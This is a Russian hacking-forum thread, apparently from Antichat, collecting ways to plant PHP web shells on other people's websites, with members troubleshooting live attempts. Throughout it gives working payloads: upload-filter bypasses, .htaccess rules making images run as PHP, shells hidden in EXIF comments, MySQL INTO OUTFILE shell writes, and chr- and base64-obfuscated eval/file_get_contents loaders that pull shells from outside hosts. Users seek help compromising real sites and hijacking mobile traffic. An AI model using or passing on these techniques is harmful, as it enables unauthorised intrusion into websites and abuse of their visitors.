Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.
В ответ придет, что то вроде:
Меняешь на:
И отправляешь.
/showpost.php?p=2344055&postcount=4
Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде:
меняем на:
и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере
Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!


Эм, так то спс, но это уже есть в статье))

и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере


Зря спалил. Такие приваты в паблик выкладываешь.

"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?





::facepalm::


Объясню:






Если ты просто так пошлёшь file_get_contents('http://url/ws.txt'), то у тебя будет:






Т. е. file_get_contents никуда не запишишиться/не выполниться.

Однако в первом случае будет:







Мы можем просто вписать:




Eval выполняет функции php, как вы видите, это мини шелл... используют так:


host.com/пут_до_той_папки_что_вы_указ али/shells.php?cmd=function_php;



Как видите, без кавычек, а тип будет String Так что теперь делаем код:


$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47 ).chr(47).chr(108).chr(101).chr(103).chr(105).chr( 111).chr(110).chr(101).chr(114).chr(115).chr(56).c hr(56).chr(46).chr(110).chr(97).chr(114).chr(111). chr(100).chr(46).chr(114).chr(117).chr(47).chr(101 ).chr(114).chr(114).chr(111).chr(114).chr(46).chr( 116).chr(120).chr(116);$content = file_get_contents($url);$h = fopen(shells.chr(46).php,w);$text = $content;fwrite($h,$text);fclose($h);

Parse error: syntax error, unexpected T_STRING in * on line 2

вписываем следующее:


UPDATE `table_name` SET `column_name_1` = '' WHERE `column_name_2` =[Значение] LIMIT 1 ;
SELECT * FROM `table_name` WHERE `column_name_2` =[Значение] INTO OUTFILE '[Полный_путь_до_папки_с_прав� �ми_закачки_файла/shell.php]' ;

Теперь переходим по адресу


host.com/пут_до_той_папки_что_вы_указ али/shells.php

Это делается одним запросом.


5.) Пятый вариант - это отличный баг Windows, а именно, иногда сайт не разрешает закачивать PHP таким образом, что когда нажимаешь к примеру на кнопку "Обзор", то он показывает только файлы изображений, и т.п. Но не отчаивайтесь - просто нажмите на этот "Обзор" (
) зайдите в директорию с шеллом, и наберите тут его имя:


Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы.

-------------

Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.

XAMENA, +10500

Ты не модер? Вот если что профили модеров:

/member.php?u=90907

/member.php?u=22449


Зря спалил. Такие приваты в паблик выкладываешь.




P.S. Мне стыдно. А я то думал ачат огого

P.S.S. TC старался. Но увы...

попугай

он угарал,когда написал приват!

>Parse error: syntax error, unexpected T_STRING in * on line 2

Может, попробуешь пробелы убрать, которые ачат наставил автоматом хрен знает зачем?) (впрочем, как и в скулях..)

>Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы.

Спасибо, буду знать

-------------

>Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.

Это не бред, это работающие способы.

Эм, так то спс, но это уже есть в статье))


все таки не нашел

все таки не нашел




4.) Ну, а этот вариант - это использовать плагин на подобии "Tamper Data" (Firefox). Можно перехватить запрос, и изменить расширение, но такой метод самый маловероятный. Обычно он спасает в тех случаях, если php не разрешает какой-нибудь JavaScript.


Попробуй так

Попробуй так


Всмысле мб имеет смысл добавить разжеванный вариант в 1й пост?

Некоторые новички может быть в хроме\опере\ие работают и не знают о тампер дате в ФФ

Я об этом говорил

Спасибо за статью, узнал много новых способов


хе-хе

по сабжу, если allow_url_fopen=off или PHP 4

[QUOTE="Strilo4ka"]
хе-хе
по сабжу, если allow_url_fopen=off или PHP 4

Статья нормальная! может смысл имеет не разжовывать а включить свой глупые мозги для залвки данным методам шел


жЕвать

я то понял, как так заливат еще давно, а вот новички то думаю не все сразу въедут

жЕвать
я то понял, как так заливат еще давно, а вот новички то думаю не все сразу въедут


Всё пошагово расписано, если не поняли - то лучше на этом пути остановиться сейчас-же..

А с чего ты решил что каждый "новичок" должен это уметь??? пусть сначало читают и т.д. как время придёт так зальют, или почитают другие статьй, тут на форуме их очень много. и мне кажеться статья ни совсем прям для новичков.


А собственно где написано, что она прямо уж для новичков? Это для среднего юзверя, жаждущего познать информацию, у которого прямые клешни и т.п..

хотелось бы увидеть про шелл в exif

Впринципе, можно сделать место функции chr(); как то так:

$url=$_GET;$content= file_get_contents($url);...бы увидеть про шелл в exif[/QUOTE]Сделано ;)

За старания и поддержку статьи плюс.

За орфографию минус.

Еще можно добавить к варианту |qbz|:

1. Коннект по ssh,

2. Попытки авторизоваться с именем

3. Инклуд логов.

said:
Еще можно добавить к варианту |qbz|:
1. Коннект по ssh,
2. Попытки авторизоваться с именем
3. Инклуд логов.


Собственно не понял, какое отношение к варианту qbz относится 1 и 2 Но добавлю.... только про 2 метод не понял, зачем нам это нужно, выполнение пхп кода в авторизации, это по-пойму немного бред (сорри) или тут в чём то другом подвох?)

З.Ы Постите методы, всё будет включено, соберём самый большой сборник, это будет неплохо, имхо!

Собственно не понял, какое отношение к варианту qbz относится 1 и 2
Но добавлю.... только про 2 метод не понял, зачем нам это нужно, выполнение пхп кода в авторизации, это по-пойму немного бред (сорри)
или тут в чём то другом подвох?)
З.Ы Постите методы, всё будет включено, соберём самый большой сборник, это будет неплохо, имхо!


я думаю кибер-панк имел ввиду, то что их спообы похожы в том, что оба сохраняются в логах.

я думаю кибер-панк имел ввиду, то что их спообы похожы в том, что оба сохраняются в логах.


ну, логи входов сложно найти, это раз.

А во-вторых, вот этот код:




Вызывает у меня большие подозрения, ведь он вызовет еррор? ладно бы eval() так нет, тут откуда то просто переменная из GET и следом ошибка синтаксиса, мы в итоге получим Fatal error: Function name must be a string, не более, имхо!

ну, логи входов сложно найти, это раз.
А во-вторых, вот этот код:



Вызывает у меня большие подозрения, ведь он вызовет еррор? ладно бы eval() так нет, тут откуда то просто переменная из GET и следом ошибка синтаксиса, мы в итоге получим Fatal error: Function name must be a string, не более, имхо!




# cat 2.php


2.php?c=system&a=ls

У меня все работает.

said:

# cat 2.php


2.php?c=system&a=ls
У меня все работает.


С eval-ом не прокатит.

С eval-ом не прокатит.


угу, тем более например у меня на локалке такой код не робит... пхп старый мб

угу, тем более например у меня на локалке такой код не робит... пхп старый мб




# php --version
PHP 5.3.2-1ubuntu4.9 with Suhosin-Patch (cli) (built: May 3 2011 00:43:34)

Да, и лучше так:

said:

# php --version
PHP 5.3.2-1ubuntu4.9 with Suhosin-Patch (cli) (built: May 3 2011 00:43:34)

Да, и лучше так:





system то робит, а eval как же?)

Так можно что то из серии сделать...

скажите залил wso2 шелл, но править .htaccess файл не дает. что можно сделать?? нужно поправить .htaccess для перекачки моб.трафа??

Права 0644

права на файл какие? если не дает я так думаю что прав нет, смотри на ядро..ищи сплоит, рутай----> профит

скажите залил wso2 шелл, но править .htaccess файл не дает. что можно сделать?? нужно поправить .htaccess для перекачки моб.трафа??
Права 0644


Открой .htaccess. Скопируй содержимое. Переименуй на 1.htaccess. Создай файл .htaccess, а туда уже Ctrl+V => Свой код => Save => PROFIT!!!11

С eval-ом не прокатит.


за то assert выручает)))

P.S: На мой взгляд самое оптимальное прятать шел что нить в таком формате и написать под нее какой нит скриптик, который в принцепи по логике можно использовать как полноценный шелл (клиентскую часть)...

за то
assert
выручает)))
P.S: На мой взгляд самое оптимальное прятать шел что нить в таком формате и написать под нее какой нит скриптик, который в принцепи по логике можно использовать как полноценный шелл (клиентскую часть)...


А вот и скриптик на html



Команда:

Значение:


Там где команда например system, а там где значение соответственно ls и тп...

также можно radio кнопки заюзать

Ну или юзать GET...

Че вы напали на парня? Все такие умные шо пздц, напишите сами статьи, а потом критикуйте.

Молодец что написал статью, многим будет полезна.

Будьте проще.

Peace.

I love this game said:
Че вы напали на парня? Все такие умные шо пздц, напишите сами статьи, а потом критикуйте.
Молодец что написал статью, многим будет полезна.
Будьте проще.
Peace.


Такие уж тут законы.. это можно сразу понять. Сидят жирные тролли и критикуют. Вот и весь форум.

Такие уж тут законы.. это можно сразу понять. Сидят жирные тролли и критикуют. Вот и весь форум.


Ну я бы так не сказал. Есть еще и такая вещь, как конструктивная критика, или просто дополнениие

said:
Ну я бы так не сказал. Есть еще и такая вещь, как конструктивная критика, или просто дополнениие


Верно, но действует это далеко не всегда (тут).. Впрочем, не будем оффтопить

Расскажите по подробней способ заливки шелла через MySQL injection. Спасибо.

Расскажите по подробней способ заливки шелла через MySQL injection. Спасибо.




select'код мини шела'into outfile'/путь относительно корня с айта/shel.php'

данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются...

также директория куда будет литься шелл должна быть разрешена для запеси.

select'код мини шела'into outfile'/путь относительно корня с айта/shel.php'

данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются...
также директория куда будет литься шелл должна быть разрешена для запеси.


также для проверки привилегий "по быстрому" рекомендую просто залить в папку /tmp/ если льётся - то права есть)

стандартные подливки.

какой кул хакер нашёлся

Большое спасибо за статью. Все те разрозненные наборы информации, что по крупицам приходилось гуглить, собрано здесь, в одном месте. Статья помогла найти ответы на некоторые вопросы, которые вроде и лежат на поверхности, но вот осознать их получилось только с конкретными примерами синктаксиса в коде, которые можно с удовольствием наблюдать тут.

Пиши есчо)

Спасибо

подскажите всё делаю как тут написано

8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:

Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:

Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...

Подробнее тут

делаю фото 123.jpg

закачиваю на сайт

скрипт сайта меняет ему название но коменты оттаются

меняет на 3973819_77116-32x32x.jpg

прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo()

так как картинка была так и остаётся

и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo()

вообще ошибка вылезает

что я не так делаю ?

подскажите всё делаю как тут написано
8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
Подробнее тут
делаю фото 123.jpg
закачиваю на сайт
скрипт сайта меняет ему название но коменты оттаются
меняет на 3973819_77116-32x32x.jpg
прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo()
так как картинка была так и остаётся
и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo()
вообще ошибка вылезает
что я не так делаю ?


какая ошибка?

возможно вы забыли ; после phpinfo()

ошибка

Access forbidden!

You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.

If you think this is a server error, please contact the webmaster.

Error 403

site.ru

Sun Mar 11 02:02:31 2012

Apache/2.2.21 (FreeBSD) PHP/5.3.5 with Suhosin-Patch

Я ещё новичок в этом

а что я там забыл ???

ребят ответе, навидите на путь истенный ))))

said:
какая ошибка?
возможно вы забыли ; после phpinfo()


Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.

И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:




























Например мы залили , тогда


http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;w hich curl;which fetch;

// Узнаем "качалку", если fetch, то


http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php

// Заливаем полноценный шелл

Если мы залили , то


http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");

Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".

Как-то так, в общем.

Alex2103,

lol. Как .jpg будет выполнятся как .php, если нет .htaccess-а? Думаю ТС сказал про exif, чтобы помочь при LFI.

ребят подскажите я обхожу фильтры, у меня картинка закачивается

всё ок! коменты остаются

ну как мне понять работает ли эта уязвимость на этом сайте

вдруг админ заблочил

то есть, я имею ввиду, и так и сяк пробовал не получается ((

Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:





















Например мы залили , тогда

http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;w hich curl;which fetch;

// Узнаем "качалку", если fetch, то

http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php

// Заливаем полноценный шелл
Если мы залили , то

http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");

Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.


ок, подправим

Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:





















Например мы залили , тогда

http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;w hich curl;which fetch;

// Узнаем "качалку", если fetch, то

http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php

// Заливаем полноценный шелл
Если мы залили , то

http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");

Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.


зачем это, если можно тупо ?e=eval(file_get_contents('http://updateyou.ru/1.txt'));

Ну, это почти всегда срабатывает =)

Полезная инфа благодарю, пару методов уже знал но всё равно добавилось знаний

Честно говоря, есть ещё пару методов, но их раскрывать не стоит

Мы сдесь делимся общеми методами, чтоб была пища для мозгов что и как можно сделать и что из этого всего общего приготовить свое уникальное, а не своими уникальнастями)

P.S: OxoTnik - не выложим

хватит выпендриваться. у вас просто нету ничего такого.

Охотник такой клоун, ой я не могу

P.s да покарает меня модер за флуд и оффтоп

Отличная статья! Молодцы ребята.

У меня вопрос, как у начинающего хакера - а можете выложить теперь стандартные способы заливки шелла? (надеюсь не ошибся в терминологии).

Заранее спасибо.

Отличная статья! Молодцы ребята.
У меня вопрос, как у начинающего хакера - а можете выложить теперь стандартные способы заливки шелла? (надеюсь не ошибся в терминологии).
Заранее спасибо.


TC ошибся. Он случайно "не" в название добавил. Извиняйте!

P.S. Троллинг не удался у тебя

TC ошибся. Он случайно "не" в название добавил. Извиняйте!
P.S. Троллинг не удался у тебя


Типо того

Вообще, стандартный метод, это тупо залить PHP, видимо =) А всё остальное - это обходы, т.е не стандартно))

Вообще, стандартный метод, это тупо залить PHP, видимо =)


На свой сайт через фтп?

На свой сайт через фтп?


Ты нах*я приват спалил?


хватит выпендриваться. у вас просто нету ничего такого.


Да вообще-то есть пару методов, которые раскрывать не стоит)

Добавил про то, что если нельзя юзать кавычки, то можно использовать base64, расписал как можно более для новичков.

А также, можно использовать Base64.
- Но ведь он оканчивается на "==" ??
спросите вы, но вот и нет, зашифруйте свой PHP код, и если на конце оказалось "==", то добавьте в ваш код "//" в коцен пхп кода, это будет комментарий, и т.к исходный файл будет на 2 символа больше, то "==" отпадает, если у вас показывает "=" (одно равно на конце), то просто тоже добавьте какой-либо символ в код, например увеличьте название переменной.
Затем этот код можно использовать без кавычек, а просто в скобках... вот так.


multiple facepalm.

Что это?! Зачем писать в файл дополнительные символы?!

Мой мозг...

до сих пор не понимаю кто позволяет этой теме жить


я


multiple facepalm.
Что это?! Зачем писать в файл дополнительные символы?!
Мой мозг...


Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д

Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д


Rest in Peace, achat!

Я думаю осстудио нужно как и суицид назначить модератором какого-нибудь раздела, ну, например, Уязвимости или Безопасность и продвинуть в ЛОА. А я, пожалуй, скоро свалю из этого местечка, что-то надоело мне тут.

Я думаю осстудио нужно как и суицид назначить модератором какого-нибудь раздела, ну, например, Уязвимости или Безопасность и продвинуть в ЛОА. А я, пожалуй, скоро свалю из этого местечка, что-то надоело мне тут.


Аналогично, продажу прикрыли. Теперь буду троллить.

я
Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д


я думал проще не обращать внимания на них

// я не совсем понимаю о чем разговор, но уверен что попал в точку

Блин, ну как мне ещё объяснить подобную фигню с base64 на русском языке?


Я думаю осстудио нужно как и суицид назначить модератором какого-нибудь раздела, ну, например, Уязвимости или Безопасность и продвинуть в ЛОА. А я, пожалуй, скоро свалю из этого местечка, что-то надоело мне тут.


Драмчик иди танцуй


а мне нравится ветка )


Это хорошо


Аналогично, продажу прикрыли. Теперь буду троллить.


Это ещё не конец запретов, просто всё потихоньку.

Спасибо, дорогой, что разрешил )


=* ))


я думал проще не обращать внимания на них
// я не совсем понимаю о чем разговор, но уверен что попал в точку


Я тебе в ПМ отписал на счёт интересного материала

Для тех, кто не в курсе - из base64 кодировки можно спокойно вырезать все "=" - и будет работать также прекрасно (запостенно только потому, что ТС удалил свои косяки, связанные с этим моментом, что не добавит образованности остальным)

Для тех, кто не в курсе - из base64 кодировки можно спокойно вырезать все "=" - и будет работать также прекрасно (запостенно только потому, что ТС удалил свои косяки, связанные с этим моментом, что не добавит образованности остальным)


Я ннне вкурсе, посоны

ЗЫ:

Добавил про String.fromCharCode

Не надо загаживать тему, соблюдаем правила. Статусных пользователей это тоже касается. Для свободного общения есть болталка.

Также подредактировал про base64, за что огромное спасибо Pashkel'e =)

О, неееееееееееееееет!
Зачем, ну зачем так изголятся над моим мозгом?! Ну не надо, ну пожалуйста!!!
Это чистый яваскрипт, он никакого, даже близкого отношения к ПХП не имеет и это видно даже по обьектной модели (присоединение метода через точку, а не ->). Короче это пи*дец ну откровенный уже.


заменил интересной темкой, с которой часто сталкиваются новички

подскажите что делаю не так

узнал путь

/home/site.ru/html/phpmyadmin/

проверил привилегии - есть (Y)

выполняю запрос

select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'

получаю ответ:

Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)

пробывал и в /home/site.ru/html/ все равно не хочет

подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет


прав нет на запись туда, очевидно.

подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет


Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images

она обычно открыта на запись...

подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет


Убедись что БД и сам сайт находится на одном хостинге!

Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images
она обычно открыта на запись...


1) зачем тему апать?

2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно.

3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту.

Например если это phpbb=>cache ,store

Wp=>upload,wp-content/themes/%тема%/

И т.д.

1) зачем тему апать?
2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно.
3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту.
Например если это phpbb=>cache ,store
Wp=>upload,wp-content/themes/%тема%/
И т.д.


тема требовала ответа, вот и ответил. Раз были уязвимости, какая может речь идти о грамотной настройке и распределении прав?!

Неплохо бы сначала

select '' from mysql.user into outfile '/tmp/1.php'

select load_file('/tmp/1.php')

проверять...

Если всё работает - то FILE_PRIV в норме. И вот только тогда начинать "угадывать" папку для заливки шелла

подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет


Apparmor , либо нету прав на запись. Да и from mysql.user не нужен. Достаточно select '' into outfile '/home/site.ru/html/phpmyadmin/shell.php'

8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
Подробнее тут


Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?

Попытался залить через phpmyadmin к сожелению ошибка

1045 - Access denied for user 'bd_hjgy'@'localhost' (using password: YES)

Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?


Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение?

Из той же статьи:

Создаём файлик .htaccess, и вписываем в него следующее:

PHP код:

AddType application/x-httpd-php .jpg

AddHandler application/x-httpd-php .jpg

Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker

Здравствуйте, прочитал статью по заливке шеллов, приступил к практике и после заливки мини шелла процесс заморозился.

Сайт на дле, /?cmd=phpinfo(); выводится, а все остальное предложенное в топике не работает(Hacking attempt!), помогите кто-нибудь до конца разобраться в этом не легком деле, буду очень Вам благодарен за помощь

стукните кто шарит в личку

Здравствуйте, прочитал статью по заливке шеллов, приступил к практике и после заливки мини шелла процесс заморозился.
Сайт на дле, /?cmd=phpinfo(); выводится, а все остальное предложенное в топике не работает(Hacking attempt!), помогите кто-нибудь до конца разобраться в этом не легком деле, буду очень Вам благодарен за помощь
стукните кто шарит в личку


попробуй такой запрос


eval(file_get_contents(base64_decode (aHR0cDovL3pvcmdlZS1ydS5wLmh0L2ZpeDEudHh0)))%3b

попробуй такой запрос

eval(file_get_contents(base64_decode (aHR0cDovL3pvcmdlZS1ydS5wLmh0L2ZpeDEudHh0)))%3b



огромное спасибо, заиклудился, а можно без искажений браузера показать что такое %3b (учусь, все надо знать )?

подкиньте, плиз, гифку с комментом

а если например открыть gif в том же notepad и дописать в конец то работает тока если в папке есть htaccess с строкой AddType application/x-httpd-php .gif . А если через exif код добавить будет без htaccess работать ?

а если например открыть gif в том же notepad и дописать в конец то работает тока если в папке есть htaccess с строкой AddType application/x-httpd-php .gif . А если через exif код добавить будет без htaccess работать ?


А как его сервер сможет обработать если он скрипты читает как скрипты, а картинку, как картинку по расширениям... нет!

подкиньте, плиз, гифку с комментом


сам сделать же можешь

http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom%20-%20A%20JPEG%20Comment%20Editor.htm

перетаскивай картинку на ехе и пиши любой коммент хоть шелл

https://3.bp.blogspot.com/_RVRW0sa79Nw/TJ_9ciz6N5I/AAAAAAAAAGU/x5T3nS-P3SA/s1600/1.jpg

народ выручайте, какие есть варианты заливки через такой бэкдор, кроме качалок curl, wget и тд?

народ выручайте, какие есть варианты заливки через такой бэкдор, кроме качалок curl, wget и тд?


echo "" >>shell.php

?cmd=echo "" > 1.php

site/1.php

site/shell.php

что то не катит, вообще только заливщиками получается, другими способами описываемые тут, не получается, что я не так делаю, понять не могу.


$url = "urlshell";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);


почему то такой способ не катит.

что то не катит, вообще только заливщиками получается, другими способами описываемые тут, не получается, что я не так делаю, понять не могу.
почему то такой способ не катит.


если не ошибаюсь allow_url_fopen должен быть включен для функции file_get_contents(); посмотри это в phpinfo();

таким же образом залей вот этот код






и из него уже лей полноценный шелл

таким же образом залей вот этот код





и из него уже лей полноценный шелл


Каким образом? Через качалки? Мне как раз нужны альтерантивные варианты заливки, когда качалки не работают, например, через такой или подобный ему код:


$content=file_get_contents("url_shell");$h=fopen("file.php",w);$text=$content;fwrite($h,$text);fclose($h);


вообщем, с помощью обычной записи в файл, вот у меня и вопрос, с помощью passthru возможно реализовать такое?

Каким образом? Через качалки? Мне как раз нужны альтерантивные варианты заливки, когда качалки не работают, например, через такой или подобный ему код:
вообщем, с помощью обычной записи в файл, вот у меня и вопрос, с помощью passthru возможно реализовать такое?


тебе по полочкам вопрос разжували, а ты тролить начинаешь!!!! удачи тебе в изучение вопросов!!!

?cmd=echo -e " \n" >> 2.php

после по адресу /2.php, оттуда лей шелл.

тебе по полочкам вопрос разжували, а ты тролить начинаешь!!!! удачи тебе в изучение вопросов!!!


с тобой все нормально?

никого я не тролю, даже больше скажу, я реально профан в этой теме и всем кто отписался тут, благодарен.

?cmd=echo -e " \n" >> 2.php

после по адресу /2.php, оттуда лей шелл.


спасибо за рабочий вариант, файл заливается, но в внутри вот это





аплоадер соответственно не работает, как то не коректно он создает его.

норобуй в начале добавить вместо

при переходе на файл открывается как плэйн-текст или что? дай сюда вывод phpinfo.

Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение?
Из той же статьи:
Создаём файлик .htaccess, и вписываем в него следующее:
PHP код:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker


